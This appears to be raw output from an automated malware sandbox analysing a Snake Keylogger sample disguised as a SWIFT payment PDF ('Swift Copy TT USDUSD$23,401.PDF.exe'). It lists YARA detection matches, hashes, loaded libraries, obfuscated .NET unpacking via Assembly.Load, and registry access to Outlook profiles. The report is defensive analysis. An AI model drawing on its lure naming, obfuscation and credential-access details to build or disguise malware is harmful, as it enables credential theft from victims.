                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1679052226.0000000008AF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1669150995.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1673192115.0000000002EDC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000000.1646539842.00000000009A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYuCz.exeB vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4105094892.0000000000D77000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exeBinary or memory string: OriginalFilenameYuCz.exeB vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, --C.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, --C.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, ----.csBase64 encoded string: 'KjlXwXHz67L4/KTtyJSSs4dh5aVfF5nOygiszyttgV0XZccffFNqgU5c02Mta8vw'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, sphcUmQKOWkVh4kjRk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, sphcUmQKOWkVh4kjRk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, sphcUmQKOWkVh4kjRk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, sphcUmQKOWkVh4kjRk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, sphcUmQKOWkVh4kjRk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, sphcUmQKOWkVh4kjRk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/3
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Swift Copy TT USDUSD$23,401.PDF.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMutant created: NULL
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Swift Copy TT USDUSD$23,401.PDF.exeVirustotal: Detection: 47%
                Source: Swift Copy TT USDUSD$23,401.PDF.exeReversingLabs: Detection: 34%
                Source: unknownProcess created: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe"
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess created: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe"
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess created: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: YuCz.pdbSHA256 source: Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Binary string: YuCz.pdb source: Swift Copy TT USDUSD$23,401.PDF.exe

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.3cb9f78.4.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.3c99f58.0.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, QN8LhUv7Bq01pTrSfL.cs.Net Code: t5GSXymohC System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, QN8LhUv7Bq01pTrSfL.cs.Net Code: t5GSXymohC System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, QN8LhUv7Bq01pTrSfL.cs.Net Code: t5GSXymohC System.Reflection.Assembly.Load(byte[])
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: 0xC4737DD4 [Mon Jun 11 00:39:48 2074 UTC]
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_07637298 push cs; ret 0_2_07637299
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010C9C30 push esp; retf 02B2h2_2_010C9D55
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A87EB push es; ret 2_2_069A8920
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A38DF push eax; iretd 2_2_069A38F2
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A8822 push es; ret 2_2_069A8920
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A8863 push es; ret 2_2_069A8920
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A39D5 push edx; iretd 2_2_069A39DA
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: section name: .text entropy: 7.682429345056732
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, GAk8ihtBa5W1IjF2oS.csHigh entropy of concatenated method names: 'FYGnlNxysf', 'xOVnGwpYl5', 'uPtnogQOkG', 'wwLoClvjtY', 'aKYozJjbJY', 'R7ZnNdLlUr', 'JatnJsa0pC', 'hYin31KGid', 'NIQnwmvcs1', 'SV3nSjlQLG'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, nQ7wrtOUeqtYQkPrOP.csHigh entropy of concatenated method names: 'Db8M4R0Hmp', 'js1MrA49jI', 'mmEMgHZsD4', 'ey6MxSPn8a', 'SagMHB3QYe', 'E71M1JAk3J', 'P93Mt0F4Lm', 'rCZMeJevIs', 'wQjMITYJHi', 'thmMYtBfS2'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, jU4QiGWcKqOGdqRA7H.csHigh entropy of concatenated method names: 'ToString', 'JDDqsYAahk', 'KKNqrG6Nbk', 'eyaqg4SsuQ', 'DvxqxgJ5Ir', 'PRxqHlU6ba', 'Rbnq1lbe6o', 'HZ9qtieX1g', 'KLHqevNFOc', 'MMWqINxIs6'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, Cvg56jCKLuGN9qnAmj.csHigh entropy of concatenated method names: 'RgOUGfp5YA', 'TOKU0BTw5s', 'tDUUoFBWiH', 'tB3UndQGbT', 'XUgUM2tVr2', 'JlnUvhVJvT', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, A2a2n9jgNGDhXoeYbl.csHigh entropy of concatenated method names: 'cE6MTvx2ta', 'vCaMhMjhRn', 'vt3MMaK9LQ', 'BUqMfXOvPA', 'roDMA5BIcD', 'ywxMcw37ol', 'Dispose', 'eMHFlFOBhO', 'UntFLiu6c3', 'dJ7FGj1rer'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, rMB5jG4QCpHfhvHovr.csHigh entropy of concatenated method names: 'OLTo90hjoo', 'REXoL2T6rL', 'P4qo0uPjd0', 'SI3ontHvC4', 'IyJovVxWkW', 'zZY0uuorgs', 'Eq30Bh4von', 'YiU0jZKtRQ', 'b8T0EDQK0o', 'VDZ0OuosmW'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, YiBkDligENmtVURwGC.csHigh entropy of concatenated method names: 'scTh7SGolb', 'Xx0h6MOZ07', 'ToString', 'aENhlTZeKH', 'jyuhLBCgiK', 'jTphGyDTBk', 'gRoh0OjOJj', 'BViho7rOfC', 'E66hnnSU1J', 'vLohvF7A5U'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, HBAAU6Zc1wT5mNwguv.csHigh entropy of concatenated method names: 'aCq0R2Hdxh', 'BMd0KHl48O', 'B9yGgV0XAt', 'KcmGxvgcVX', 'mFRGHggDcH', 'bNKG1wmEBF', 'IMTGtpdEMY', 'JZDGe6h5Yp', 'vYJGIAD3LR', 'jRWGYHTbFH'
